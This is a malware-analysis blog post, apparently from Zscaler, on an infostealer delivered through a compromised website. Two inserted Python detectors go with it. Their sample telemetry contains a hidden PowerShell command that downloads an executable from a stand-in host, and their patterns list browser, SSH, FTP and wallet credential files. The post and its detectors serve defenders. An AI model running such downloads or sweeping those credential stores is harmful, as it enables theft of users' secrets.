
Infostealer spreading through a compromised website

By: Tarun Dewan


The Zscaler ThreatLabZ team has uncovered a new password-stealer malware variant being delivered through a compromised website. The payload is compiled to Microsoft Intermediate Language (MSIL) and steals passwords from the victim's system, browsers, and FTP software.

The payload analyzed in this blog was served from the compromised website dnoymuzik[.]com/wp-content/test/conhost[.]exe. 

Delivery vector

The delivery vector for this malware is a VBScript file, which downloads the payload from the compromised website and then downloads a decoy document to make the victim believe the downloaded files are legitimate. The VBScript file performs the following activities:

  • Downloads a decoy document
  • Terminates the Microsoft Word process
  • Downloads the payload through a PowerShell command
  • Removes Microsoft Word's document recovery entries from the registry
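The four actions above are all host-observable, so they can be correlated into a single detection. The following is an added example (not Zscaler's code and not the dropper itself): it runs over a constructed, Sysmon-style event stream of pipe-separated key=value fields and flags a script host (wscript.exe/cscript.exe) that shows two or more of the dropper's behaviours. The event shapes, field names, the sample PowerShell command line and the Word Resiliency registry path are assumptions.

```python
"""Correlate the VBScript dropper chain described in the post.

Added example, not Zscaler's code. Event shapes, field names, the sample
command line and the Word Resiliency registry path are assumptions.
"""
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# PowerShell download primitives, or a URL, in a child command line.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|https?://", re.I)
# Word keeps document-recovery entries under ...\Word\Resiliency\ (assumed key layout).
RESILIENCY_RE = re.compile(r"\\Word\\Resiliency\\", re.I)

# Constructed telemetry: one script host performing the three host-visible
# dropper actions, plus unrelated PowerShell activity as benign noise.
SAMPLE_EVENTS = [
    "type=process_create|pid=4100|ppid=3020|image=C:\\Windows\\System32\\wscript.exe|cmd=wscript.exe notice.vbs",
    "type=process_create|pid=4112|ppid=4100|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|cmd=powershell -w hidden Invoke-WebRequest http://example.invalid/conhost.exe -OutFile C:\\Users\\Public\\conhost.exe",
    "type=process_terminate|pid=4100|target=WINWORD.EXE",
    "type=registry_delete|pid=4100|key=HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\DocumentRecovery\\1A2B",
    "type=process_create|pid=5000|ppid=3020|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmd=powershell Get-Process",
]


def parse(line):
    """Turn 'k=v|k=v' into a dict; only the first '=' of each field splits."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(lines, threshold=2):
    """Return [(script_host_pid, [indicators])] for hosts with >= threshold indicators."""
    events = [parse(line) for line in lines]
    hosts = {e["pid"] for e in events
             if e["type"] == "process_create" and basename(e["image"]) in SCRIPT_HOSTS}
    hits = defaultdict(set)
    for e in events:
        kind = e["type"]
        # PowerShell spawned by the script host with a download in its command line
        if (kind == "process_create" and e["ppid"] in hosts
                and basename(e["image"]) == "powershell.exe" and DOWNLOAD_RE.search(e["cmd"])):
            hits[e["ppid"]].add("powershell_download")
        # The script host terminating Word
        elif kind == "process_terminate" and e["pid"] in hosts and e["target"].lower() == "winword.exe":
            hits[e["pid"]].add("word_terminated")
        # The script host deleting Word's document-recovery entries
        elif kind == "registry_delete" and e["pid"] in hosts and RESILIENCY_RE.search(e["key"]):
            hits[e["pid"]].add("word_recovery_cleared")
    return [(pid, sorted(ind)) for pid, ind in sorted(hits.items()) if len(ind) >= threshold]


if __name__ == "__main__":
    for pid, indicators in detect(SAMPLE_EVENTS):
        print(f"script host pid {pid}: {', '.join(indicators)}")
```

Requiring two of the three indicators keeps a lone PowerShell download (common in admin scripts) from firing on its own, while the registry and Word-termination steps, which have little legitimate reason to follow a script host, push the score over the threshold.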


Figure 1: Screen capture of VBScript activity

Figure 2: Screen capture of the decoy document

The decoy document poses as a "public service" message from a government organization and includes spam mitigation instructions. 

Once the malware is executed, it performs various password-stealing activities, such as checking for installed antivirus products and looking through the directories and files from which it will steal information. The most interesting function of this malware is that it also behaves like a file stealer: it searches the system for interesting strings while enumerating files and folders, and uploads what it finds to the malware's C&C server once it has collected the sensitive information (Figure 3):

Figure 3: Checking for installed antivirus products

Figure 4: Looking at directories and files for stealing passwords and collecting information

Figure 5: Checking for strings on the system while enumerating files and folders, and uploading to the C&C

The following screen captures show the different file extensions that the malware targets on the victim's machine when stealing credentials:

Figure 5: Strings of extensions

Figure 6: Strings of extensions

The screen captures below show snippets of the password-stealing routines for various browsers and software, run before the data is uploaded to the C&C server:

Figure 7: Chrome password stealer

Figure 8: Uploading to the C&C server


Figure 9: CuteFTP password stealer


Figure 10: Electrum Bitcoin password stealer

Figure 11: Firefox password stealer


The malware steals passwords from the following software and browsers:

  • Armory wallet
  • Chrome
  • Firefox
  • CuteFTP
  • FileZilla
  • PuTTY
  • Electrum Bitcoin wallet
  • WinSCP
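Because the stores listed above belong to unrelated applications, a single process reading several of them within seconds is a strong behavioural signal, whereas each store's own application reading its own files is normal. The following is an added example (not Zscaler's code and not the malware's) of that heuristic run over a constructed stream of file-read events: it classifies paths into store categories derived from the post's software list, ignores the owning application, and flags any other process that touches three or more categories inside a short window. The event format, the file-name patterns and the owning-application executable names are assumptions.

```python
"""Flag one process sweeping across unrelated credential stores.

Added example, not Zscaler's code. Event format, path patterns and the
owning-application names are assumptions.
"""
import re
from collections import defaultdict

# Store category -> path patterns (case-insensitive). Categories follow the
# software named in the post; the concrete file names are assumptions.
STORE_PATTERNS = {
    "browser": [r"\\Login Data$", r"\\logins\.json$", r"\\key4\.db$"],
    "ftp": [r"\\FileZilla\\(sitemanager|recentservers)\.xml$", r"\\CuteFTP\\", r"\\WinSCP\\"],
    "ssh": [r"\.ppk$", r"\\\.ssh\\id_[a-z0-9]+$"],
    "wallet": [r"\\Electrum\\wallets\\", r"\\Armory\\.*\.wallet$"],
}
# Processes for which reading that category is expected (assumed names).
STORE_OWNERS = {
    "browser": {"chrome.exe", "firefox.exe"},
    "ftp": {"filezilla.exe", "winscp.exe", "cuteftp.exe"},
    "ssh": {"putty.exe", "pageant.exe"},
    "wallet": {"electrum.exe", "armoryqt.exe"},
}
COMPILED = {cat: [re.compile(p, re.I) for p in pats] for cat, pats in STORE_PATTERNS.items()}

# Constructed file-read telemetry: ts is epoch seconds.
SAMPLE_EVENTS = [
    "ts=1000|pid=4112|image=C:\\Users\\Public\\conhost.exe|path=C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "ts=1001|pid=4112|image=C:\\Users\\Public\\conhost.exe|path=C:\\Users\\bob\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\x1.default\\logins.json",
    "ts=1002|pid=4112|image=C:\\Users\\Public\\conhost.exe|path=C:\\Users\\bob\\AppData\\Roaming\\FileZilla\\sitemanager.xml",
    "ts=1003|pid=4112|image=C:\\Users\\Public\\conhost.exe|path=C:\\Users\\bob\\.ssh\\id_rsa",
    "ts=1004|pid=4112|image=C:\\Users\\Public\\conhost.exe|path=C:\\Users\\bob\\AppData\\Roaming\\Electrum\\wallets\\default_wallet",
    # The browser reading its own store: expected, not a finding.
    "ts=1005|pid=2200|image=C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe|path=C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data",
    "ts=1010|pid=2300|image=C:\\Windows\\System32\\notepad.exe|path=C:\\Users\\bob\\notes.txt",
    # A slow sweep spread over hours (e.g. a backup agent) does not fit in one window.
    "ts=2000|pid=2400|image=C:\\backup\\agent.exe|path=C:\\Users\\bob\\.ssh\\id_rsa",
    "ts=9000|pid=2400|image=C:\\backup\\agent.exe|path=C:\\Users\\bob\\AppData\\Roaming\\FileZilla\\sitemanager.xml",
    "ts=16000|pid=2400|image=C:\\backup\\agent.exe|path=C:\\Users\\bob\\AppData\\Roaming\\Electrum\\wallets\\default_wallet",
]


def parse(line):
    return dict(field.split("=", 1) for field in line.split("|"))


def classify(path):
    """Return the store category a path belongs to, or None."""
    for cat, pats in COMPILED.items():
        if any(p.search(path) for p in pats):
            return cat
    return None


def detect(lines, window=60, threshold=3):
    """Return [(pid, image, [categories])] for processes reading >= threshold
    distinct store categories within `window` seconds."""
    per_proc = defaultdict(list)
    for line in lines:
        e = parse(line)
        cat = classify(e["path"])
        if cat is None:
            continue
        image = e["image"].rsplit("\\", 1)[-1].lower()
        if image in STORE_OWNERS[cat]:
            continue  # the owning application reading its own store is normal
        per_proc[(e["pid"], image)].append((int(e["ts"]), cat))
    alerts = []
    for (pid, image), reads in sorted(per_proc.items()):
        reads.sort()
        for i, (start, _) in enumerate(reads):
            cats = {c for t, c in reads[i:] if t - start <= window}
            if len(cats) >= threshold:
                alerts.append((pid, image, sorted(cats)))
                break
    return alerts


if __name__ == "__main__":
    for pid, image, cats in detect(SAMPLE_EVENTS):
        print(f"pid {pid} ({image}) read {len(cats)} credential stores: {', '.join(cats)}")
```

The window and threshold are the tuning knobs: widening the window catches slower sweeps at the cost of flagging legitimate backup or sync agents, which is why the benign agent in the sample only fires when the window is made very large.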


Network communication

Figure 12: Network information


Below is a snapshot of the data stolen from the victim's machine by the malware author:

Figure 13: Stolen data

Conclusion

This is yet another infostealer malware that attempts to steal stored credentials from a victim's machine. The malware also contains modules to steal sensitive files such as private keys, SSH keys, bitcoin wallets, etc. ThreatLabZ will continue to monitor this malware to ensure that Zscaler customers are protected.

The Zscaler Cloud Sandbox report highlighting the indicators is shown in the screenshot below:

Figure 14: Zscaler Cloud Sandbox malware report
